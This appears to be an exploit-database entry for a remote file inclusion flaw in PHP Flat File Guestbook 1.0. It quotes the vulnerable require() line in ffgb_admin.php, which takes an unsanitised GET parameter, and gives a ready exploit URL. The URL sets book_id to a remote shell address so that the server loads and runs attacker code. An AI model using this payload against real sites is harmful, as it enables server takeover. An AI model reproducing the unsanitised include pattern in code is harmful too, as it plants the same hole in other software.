PHP Flat File Guestbook Remote File Inclusion Vulnerability

2011-08-1100:00:00

RiRes Walid

0day.today

JSON

Exploit for php platform in category web applications

# Exploit Title: Rfi PHP Flat File Guestbook
# Date: 11-08-2011
# Author: RiRes Walid
# Vendor or Software Link: http://www.advancebydesign.com
# Version: 1.0
# Google dork:
# Tested on: Xp sp2
------------------------------------------------------------
Remote File Inclusion
in ffgb_admin.php
line : 339
 
require('ffgb_comments/ffgb_'.$_GET['book_id'].'.php');
 
[o] Exploit
   
       http://localhost/[path]/ffgb_admin.php?book_id=http://shell?
 
-------------------------------------------------------------  



#  0day.today [2018-04-12]  #

JSON